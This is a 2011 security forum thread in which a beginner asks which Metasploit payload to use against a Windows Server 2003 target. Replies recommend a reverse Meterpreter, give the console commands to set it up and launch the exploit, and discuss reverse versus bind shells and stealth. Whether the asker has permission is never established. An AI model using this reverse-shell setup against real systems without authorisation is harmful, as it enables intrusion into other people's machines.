.

a question about metasploit

<<

midnight monster

User avatar

Newbie
Newbie

Posts: 38

Joined: Fri Nov 11, 2011 9:46 am

Location: In the darkness

Post Fri Nov 11, 2011 1:58 pm

a question about metasploit

Hello there!
i have a problem witn metasploit i dont wich of payloads is best for my exploit ( i know the server vulnerabilite and i sure about my expliot )and when i use "show payloads" command i see a lot of compatible payloads please help me to find the best payload
MCITP - Network +
<<

mambru

Jr. Member
Jr. Member

Posts: 98

Joined: Wed Jun 03, 2009 3:11 pm

Post Fri Nov 11, 2011 2:08 pm

Re: a question about metasploit

The "best" payload to use will depend on you scenario.

http://www.offensive-security.com/metasploit-unleashed/Payload_Types
<<

24772433

User avatar

Newbie
Newbie

Posts: 34

Joined: Thu Oct 20, 2011 3:22 pm

Location: UK

Post Fri Nov 11, 2011 4:32 pm

Re: a question about metasploit

Try each one and see which works best for you! That's part of the fun of Metasploit. For each one that doesn't work try to find out why!

Steve
<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Fri Nov 11, 2011 9:24 pm

Re: a question about metasploit

As previously mentioned we don't know your environment, or your target for that matter.

If it's within a local lab environment, targeting a Windows system, give the reverse meterpreter a try...

set payload windows/meterpreter/reverse_tcp
set lhost <your ip>
set lport 8888
exploit
<<

midnight monster

User avatar

Newbie
Newbie

Posts: 38

Joined: Fri Nov 11, 2011 9:46 am

Location: In the darkness

Post Sat Nov 12, 2011 2:57 pm

Re: a question about metasploit

oh steve are you kiding!! it has hundred compatible payload and it takes a lot of time for me
MCITP - Network +
<<

24772433

User avatar

Newbie
Newbie

Posts: 34

Joined: Thu Oct 20, 2011 3:22 pm

Location: UK

Post Sat Nov 12, 2011 6:08 pm

Re: a question about metasploit

midnight monster wrote:oh steve are you kiding!! it has hundred compatible payload and it takes a lot of time for me


OK. What is the server OS and vulnerability? If it's Windows then Meterpereter (as mentioned by BILLV) is always a favorite of mine.

Steve
<<

msfsinn3r

Post Sat Nov 12, 2011 6:34 pm

Re: a question about metasploit

On Windows, a meterpreter is always better because all windows post modules support it (plus tons of features).  It also communicates in SSL, so that adds a bit more stealth.  On Linux though, it's a different story, honestly you're probably better off with a non-meterpreter shell, because the Linux meterpreter isn't as good as the windows one.

reverse vs bind... come to think about it, I almost never use bind these days on a machine behind a firewall.  But people do use bind shells.

By the way, when you select an exploit, and do "show payloads" -- that will only show all the payloads compatible with that particular exploit.  If you're testing a web app exploit, keep in mind php/exec might not return an output (even though the command ran successfully).

If you're still clueless about which payload to use, just use a reverse meterpreter like everybody else has been recommending.

Lastly, perhaps you should consider asking Metasploit questions on #metasploit in freenode, so the actual metasploit dev team can answer your questions more quickly.

And yes... I did sign up for an account here just to answer your question.
Last edited by msfsinn3r on Sat Nov 12, 2011 6:42 pm, edited 1 time in total.
<<

midnight monster

User avatar

Newbie
Newbie

Posts: 38

Joined: Fri Nov 11, 2011 9:46 am

Location: In the darkness

Post Sun Nov 13, 2011 1:16 am

Re: a question about metasploit

Thank you msfsinn3r your info was very useful for me
my sever is windows server 2003
and thanks alot
MCITP - Network +
<<

nytfox

User avatar

Newbie
Newbie

Posts: 20

Joined: Mon Nov 28, 2011 1:54 am

Post Sun Jan 29, 2012 3:50 am

Re: a question about metasploit

btw you can use search commend to get selected exploits , like "search smb" . try it and lemme know :)
Unlike others I love NULLS
http://treasuresec.com

Return to Tutorials

Who is online

Users browsing this forum: No registered users and 0 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software